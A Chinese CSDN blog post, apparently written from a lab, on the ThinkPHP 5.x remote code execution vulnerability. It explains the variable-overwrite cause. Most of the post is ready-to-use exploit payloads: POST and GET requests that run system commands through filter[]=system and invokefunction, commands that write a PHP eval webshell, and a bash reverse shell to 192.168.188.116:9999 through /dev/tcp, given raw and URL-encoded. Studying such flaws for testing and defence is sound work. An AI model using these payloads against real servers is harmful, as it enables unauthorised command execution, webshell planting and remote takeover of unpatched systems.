thinkphp5框架漏洞

最新推荐文章于 2024-05-11 19:02:01 发布
最新推荐文章于 2024-05-11 19:02:01 发布
阅读量1.3k 收藏 19
点赞数 16
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74196038/article/details/136471755
版权
本文详细描述了ThinkPHP框架中5.x版本的一个远程代码执行漏洞,指出无需登录即可执行任意命令,涉及版本范围和利用方法,包括GET和POST请求的PoC实例,以及如何通过系统函数执行PHP代码和创建反弹shell。
摘要由CSDN通过智能技术生成

条件:

根据ThinkPHP版本,如是5.x版本,即可使用ThinkPHP 5.x远程代码执行漏洞,无需登录,即可执行任意命令,获取服务器最高权限。

具体版本

5.x < 5.1.31

 5.0.x<= 5.0.23

框架介绍:

ThinkPHP是一个免费开源的,快速、简单的面向对象的
轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的

 工具fuzz:

扫描到了

但是这里靶场搭建在本机,工具也在本机,由于工具本身的问题,可能会执行不了命令。把靶场搭建在虚拟机,再去尝试发现可以成功。

poc:  windos

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

注意:通过post方法提交上面的poc的同时,还要通过url当中传递参数?s=captcha(指定路由规则)

操作:
原因分析:

该漏洞的本质是由变量覆盖造成的rce漏洞。

poc分析

method=get 因为captcha的路由规则是get方式下的,所以我们得让method为get,才能获取到captcha的路由
s=captcha 因为在进入exec函数后我们要switch到method中执行param函数,而这个captcha的路由刚好对应类
型为method,所以我们选择captcha
filter[]=system 覆盖变量
get[]=whoami 覆盖变量
_method=__construct 为了能够进入construct,从而覆盖变量  

poc利用:
不仅可以用来执行系统命令

还可以用来写入一句话木马

补充:system函数是php当中的函数,它不仅可以用来执行系统命令也可以用来执行php代码

使用 echo向文件中输出内容的基本方法是使用IO重定向指令——“>”,默认情况下echo输出到标准输出(屏幕)中,使用>指令可重定向输出到文件中。

poc:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php phpinfo(); ?>" > shell.php
注意echo的后面要有空格,否则写入的内容为空

 通过echo输出字符串,原本是输出到屏幕当中,这里使用文件重定向,将内容输出到指定文件当中,如果文件不存在则创建文件并写入。

虽然写入的php文件当中php代码是被双引号包裹的,但是这里文件后缀就是php,只要符合php格式的,就会以php格式去解析,所以代码还是可以执行的。

poc:Linux:

_method=__construct&filter[]=system&method=get&get[]=pwd
请求路径:index.php?s=captcha
调用system 执行whoami
TP5的验证码在
/vendor/topthink/think-
captcha 目录下,文件

get请求方法poc

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

注意:需要对特殊字符使用^转义
(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url码不编码都行。

get方法写入shell poc
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php@eval($_POST[cmd]);?^> >shell.php

反弹shell(需进行url特殊符号编码)

什么是反弹shell(reverse shell)?
就是控制端监听某TCP/UDP端口,被控端发起请求到该端口建立连接,并将其命令行的输入输出转到攻击机。

这个poc是通过post方法提交的,然后url当中还是要提交?s=captcha

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=/bin/bash+-
c+"bash+-i+>%26+/dev/tcp/192.168.188.116/9999+0>%261“
特殊url编码之后的POC
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=/bin/bash+-
c+"bash%20-i%3E%26%20%2Fdev%2Ftcp%2F192.168.188.116%2F9999%200%3E%261"

反弹shell命令解释


/bin/bash -c: 这是在Linux中执行一个shell命令的标准方式。
bash -i: 这会进入交互模式的shell
>& /dev/tcp/192.168.188.116/9999 0>&1: 这部分是一个用于将输出和输入重定向到指定IP地址和
端口的命令,实现了远程连接

使用dev/tcp协议:在执行bashshell的同时,与指定的ip和端口建立tcp连接

0> :是bash命令当中的输入输出重定向

0>&1:将输入输出连接在一起

这个里面的ip就是攻击机的ip,这段代码是要发给靶机去执行bashshell,然后弹出shell之后让他访问攻击机的IP和端口,同时因为攻击机开启了对应监听的端口,所以在攻击机就获得了靶机的shell。

阿翔要努力
关注
  • 16
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP 系列漏洞_thinkphp漏洞
2401_83739472的博客
04-12 1038
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。attr) : null //进行判断时,需要通过toArray()将getAttr($attr)进行数据类型转换,Output类中不存在toArray()方法,触发 think\console\Output::__call()调用不存在的方法。**一个人可以走的很快,但一群人才能走的更远。薪资区间6k-15k。
Thinkphp5.X全版本通杀漏洞分析
weixin_44489066的博客
01-16 1万+
最近爆出了Thinkphp5.0.*全版本代码执行,其中5.1与5.2全版本在生产环境下同样也存在代码执行漏洞 漏洞分析: 文件位置: \thinkphp\library\think\Request.php /** * 当前的请求类型 * @access public * @param bool $origin 是否获取原始请求类型 * @return sting */ pub...
网络安全深入学习第二课——热门框架漏洞(RCE—Thinkphp5.0.23 代码执行)
p36273的博客
09-16 1457
简言之,别人帮你建好了房子但尚未装修,你需要在别人设计好的户型里去装修,省去你搬砖的重复性操作。------ ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列,各个系列之间在代码实现及功能方面,有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护,ThinkPHP 5系列现使用最多,而ThinkPHP 3系列也积累了较多的历史用户。
ThinkPHP5.0.x远程执行漏洞分析与复现
最新发布
qq_74148743的博客
05-11 965
2018年12月10日,ThinkPHPv5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞。此次漏洞ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程的代码执行,进而获得服务器权限。
ThinkPHP5.1.x反序列化漏洞分析
mingyqf的博客
05-04 1148
发表于 2020-01-11| 更新于 2020-06-07|代码审计 字数总计:2.6k|阅读时长: 10 分钟 环境搭建 ThinkPHP 自版本 5 以后采用 composer 安装模块,这里附上安装指令 composer create-project --prefer-dist topthink/think=5.1.35 tp5.1.35 由于反序列化需要触发点,官方框架里是没有现成的反序列化触发点,我们这里给他构造一个 设置完毕后在 TP 根目录下启动服务即可 php think run
ThinkPHP V5.0.5漏洞_【每日安全资讯】滥用 ThinkPHP 漏洞的僵尸网络 Hakai 和 Yowai
weixin_39541681的博客
11-08 703
前言网络犯罪分子正在利用一个在2018年12月被发现和已修补的ThinkPHP漏洞传播Yowai(Mirai变种)和Hakai(Gafgyt变种)两种僵尸网络病毒。网络犯罪分子利用字典攻击破坏使用PHP框架创建网站的Web服务器,并获得这些路由器的控制,以实现分布式拒绝服务攻击(DDoS)。YowaiYowai(BACKDOOR.LINUX.YOWAI.A,由趋势科技检测)具有与其他Mirai变体...
快速开发后台不用太多代码的 tp5_「漏洞分析」ThinkPHP5任意代码执行分析全记录...
weixin_39994438的博客
11-21 388
一 、前言ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的轻量级PHP开发框架,具有免费开源、快速、简单且面向对象等特点。在ThinkPHP的5.*版本中存在安全隐患,由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,可能出现getshell漏洞。受影响的版本包括5.0和5.1。本期安仔课堂,ISEC实验室的黄老师将为大家介绍Think...
ThinkPHP5远程命令执行漏洞
qq_45314073的博客
09-20 2021
thinkPHP5漏洞复现
复现ThinkPHP5 5.0.23远程代码执行漏洞
weixin_56513549的博客
02-21 3350
访问/index.php?s=captcha页面,会出现如下报错: 执行whoami 查看当前目录 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd 写入一句话木马并访问 aaabbb 这里使用Base64 编码: _method=__construct&filter[]=system&method=get&server[RE...
thinkphp漏洞检测工具
06-06
2. **漏洞扫描**:运行工具后,它会自动遍历指定的URL,检查ThinkPHP框架中的常见漏洞。这个过程可能需要一些时间,因为工具会尝试各种可能的攻击向量。 3. **结果分析**:扫描完成后,工具会生成一份报告,列明...
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
thinkphp5远程执行代码漏洞修复补丁
tp5漏洞利用工具.zip
01-03
标题中的“tp5漏洞利用工具.zip”指的是一个包含利用ThinkPHP5框架安全漏洞的工具包,这个压缩包主要用于测试和展示ThinkPHP5代码执行漏洞的利用方式。描述提到,这个工具包含了两种方法,用于在目标系统上检测并...
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
12-18
ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。早期的思想架构来源于Struts...
thinkphp 一键漏洞检测
12-09
该工具适用于ThinkPHP框架的多个版本,从V3.2.0到V5.1.23,涵盖了ThinkPHP发展过程中的主要版本。这表明它具有广泛的适用性,能够帮助管理员或开发者快速检测并修复不同版本ThinkPHP框架安全问题。 在网络安全中...
ThinkPHP漏洞大全
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
thinkphp5.0漏洞修复
心学的博客
09-07 1421
thinkphp5.0漏洞修复
漏洞复现----23、ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
七天
07-14 1327
文章目录一、漏洞简介二、漏洞代码三、漏洞复现五、修复代码 一、漏洞简介 ThinkPHP是PHP语言的一种开源框架ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。 由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可以执行任意方法,从而导致远程命令执行漏洞。受影响的版
thinkphp漏洞总结
热门推荐
scu_hacker博客
01-19 1万+
目录 前言 一、远程代码执行漏洞 1.1 影响范围 1.2 漏洞详情 二、5.x远程命令注入 三、5.1.x SQL注入 前言 thinkphp是一个国内轻量级的开发框架,采用php+apache,在更新迭代中,thinkphp也经常爆出各种漏洞thinkphp一般有thinkphp2、thinkphp3、thinkphp5、thinkphp6版本,前两个版本已经停止更新,主要介绍下thinkphp5的漏洞 一、远程代码执行漏洞 1.1 影响范围 thinkphp&l...
thinkphp5.x 漏洞 修复
10-30
ThinkPHP是一款流行的PHP开发框架,5.x版本也是比较常用的版本。虽然ThinkPHP是一个优秀的框架,但仍然存在一些潜在的安全漏洞,因此及时修复这些漏洞是非常重要的。修复ThinkPHP 5.x漏洞可以从以下几个方面入手: 1. 更新最新版本:保持框架的版本更新是修复漏洞的首要措施。ThinkPHP团队会不断发布更新版本来修复漏洞和增加新功能,因此及时更新到最新版本是必要的。可以在官方网站上查看并下载最新版本的ThinkPHP。 2. 安全审计:进行代码审计是另一个重要的步骤。检查应用程序的代码和配置文件,特别是控制器和模型中的用户输入和数据库查询,以确保没有任何可能导致代码执行或SQL注入等安全问题的漏洞。 3. 安全加固:可以通过加强安全措施来修复漏洞。例如,禁用不必要的文件或函数、密钥管理和访问控制等措施可以帮助提高系统的安全性。 4. 过滤用户输入:用户输入是最常见的安全漏洞来源之一。应该对用户输入数据进行严格的过滤和验证,确保输入的数据符合预期的格式和范围,并防止XSS和SQL注入等攻击。 5. 强化认证与权限管理:加强用户认证措施,使用强密码和加密技术来保护用户的登录信息。在系统中实施严格的权限管理,限制用户的访问权限,以避免恶意用户越权操作。 总之,修复ThinkPHP 5.x漏洞需要全面考虑各个方面的安全问题,并严格遵循最佳实践。及时更新版本、进行安全审计、加强安全措施、过滤用户输入、强化认证与权限管理等措施都是非常有效的方法。同时也建议开发者关注ThinkPHP官方的漏洞公告和安全建议,及时了解并修复已经公开的漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值